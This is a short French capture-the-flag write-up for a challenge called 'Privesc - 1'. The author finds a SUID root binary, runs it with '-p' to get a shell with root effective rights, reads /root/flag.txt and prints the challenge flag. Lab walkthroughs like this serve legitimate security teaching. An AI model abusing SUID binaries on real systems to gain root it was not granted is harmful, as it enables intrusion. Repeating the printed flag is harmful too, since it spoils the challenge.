✨ Privesc - 1

👀 Avant de commencer

Vous pouvez me faire un don via Buy Me a Coffee ou me suivre Github

🚩 Avoir le flag

Nous arrivons sur un challenge ou nous avons cela:

level1@Midnight:~$ ls -la
total 16
drwxr-xr-x 2 root  root  4096 Mar 15  2024 .
drwxr-xr-x 3 root  root  4096 Mar 15  2024 ..
-rwsr-xr-x 1 root level1 7320 Mar 15  2024 privesc1

Nous avons un binaire avec les droits suid et s pour le groupe level1.

level1@Midnight:~$ ./privesc1
level1@Midnight:~$

Quand nous l'éxécutons, il ne se passe rien. Cela veux soit dire que le binaire ne fais rien, soit nous sommes dans un nouveau shell.

Nous allons regarder ça rapidement:

level1@Midnight:~$ echo $$
888
level1@Midnight:~$ ./privesc1
level1@Midnight:~$ echo $$
5489

Nous avons bien un nouveau shell. Nous allons regarder de quel type de shell il s'agit:

level1@Midnight:~$ id
uid=1001(level1) gid=1001(level1) euid=0(root) groups=0(root),1001(level1)
level1@Midnight:~$ echo $SHELL
/bin/bash

D'accord nous avons enfaite une nouveau bash avec les droits root. Nous allons donc pouvoir lire le flag:

level1@Midnight:~$ ./privesc1 -p
level1@Midnight:~$ cat /root/flag.txt
MCTF{Pr1v1l3g3_3sc4l4t10n_1S_4lw4y5_4_B4d_1d34_4nd_4_B4d_3nv1r0nm3nt}

💖 Support

👀 Avant de quitter

Vous pouvez me faire un don via Buy Me a Coffee ou me suivre Github